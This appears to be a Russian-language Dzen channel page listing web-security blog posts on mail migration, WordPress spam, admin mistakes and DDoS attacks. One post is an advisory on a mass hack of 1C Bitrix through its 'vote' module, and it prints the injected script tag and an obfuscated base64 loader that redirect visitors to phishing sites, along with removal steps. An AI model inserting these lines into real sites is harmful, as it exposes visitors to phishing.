Найти в Дзене
Перенос почты с любого почтового ящика
Иногда может потребоваться перенос почты с одного почтового ящика на другой. Например, по каким-либо вы больше не хотите использовать почтовый ящик в почтовой системе gmail и хотите полностью от него отказаться, но там хранится важная переписка и в идеале вам бы не хотелось ее потерять. Что же делать ? На помощь нам приходит замечательная утилита imapsync, которая позволяет перенести все письма с любого почтового сервиса, на любой другой сервис. Данный пример рассмотрен для операционной системы Linux (Ubuntu 20...
3 года назад
Борьба со СПАМ записями на примере CMS Wordpress
Появление нежелательной информации на сайте всегда несет в себе крайне негативные последствия для владельца веб ресурса. Например, сгенерированный злоумышленником контент может попасть под индексацию поисковой системы и вызвать появление не релевантных страниц на сайте, а в некоторых случаях даже вызвать блокировку со стороны поисковой системы (попадание сайта в черный список). Каким образом может генерироваться нежелательная спам запись? Рассмотрим конкретную ситуацию на примере популярной CMS wordpress...
3 года назад
Массовый взлом CMS 1С Bitrix (ошибка 500 на сайте). В настоящий момент наблюдается всплеск взломов CMS 1С Bitrix. Злоумышленники используют уязвимость в модуле «vote» CMS Bitrix до версии 22.0.400, которая позволяет записать произвольные файлы в уязвимую систему посредством отправки специально сформированных пакетов. В настоящий момент вредоносная вставка была добавлена злоумышленником с ошибкой, в строке кода был добавлен знак переноса "\n", что вызывает критическую ошибку на сайте (ошибка 500). Как должен был работать данный сценарий: Злоумышленник загружает на веб-сайт модифицированный файл (/bitrix/modules/main/include/prolog.php), в который добавляется строка -\n<script src="https://storejscdn.pw/jqueryui.js"></script>;(домен может изменяться). Эта строка кода вызывает удаленный скрипт jquery-ui.js. В коде jquery-ui.js , написано условие, что, если переход пользователя на зараженный сайт осуществлен из поисковой системы в первые за сутки, то открывается URL-адрес otrasoper[.]ga/help/?23211651614614, который осуществляет переадресацию пользователей российского сегмента сети Интернет на фишинговые сайты различных маркетплейсов. Как исправить ? Нужно, отредактировать файл /bitrix/modules/main/include/prolog.php удалив из него строку \n<script src="https://storejscdn.pw/jqueryui.js"></script>; (домен может изменяться) Также нужно проверить наличие в файлах: bitrix/js/main/core/core.js bitrix/templates/cm_main/js/jquery-1.10.2.min.js Подобной строки: s=document.createElement(`script`);s.src=atob(`aHR0cHM6Ly90ZWNobWVzdG9yZS5wdy9qcXVlcnktdWkuanM=`);document.head.appendChild(s); Ее также следует удалить. В целях избежания повторения ситуации рекомендуем отключить или удалить модуль «vote».
3 года назад
Наиболее распространенные ошибки администратора веб-ресурса
При заражении ресурса вредоносным содержимым у владельца сайта появляется множество неприятных хлопот. Казалось бы недавно работающий и приносящий прибыль ресурс перестает быть таковым и в некоторых случаях начинает работать в убыток. Поисковые системы перестают индексировать сайт, вместо корректного описания в поисковой выдаче потенциальные клиенты наблюдают неприятное сообщение: Сайт может угрожать безопасности вашего компьютера или мобильного устройства. Не стоит объяснять какой будет реакция...
3 года назад
DDoS-атака. Что это такое ?
DDoS-атака - это попытка злоумышленником нарушить нормальный трафик целевого сервера, сети или конкретного сайта путем перегрузки цели или окружающей ее инфраструктуры потоком интернет-трафика. DDoS-атаки достигают эффективности за счет использования множества скомпрометированных компьютерных систем в качестве источников атакующего трафика. Эксплуатируемые удаленные машины могут включать компьютеры и другие сетевые ресурсы, например устройства Интернета вещей. Если немного абстрагироваться, то...
3 года назад
Если нравится — подпишитесь
Так вы не пропустите новые публикации этого канала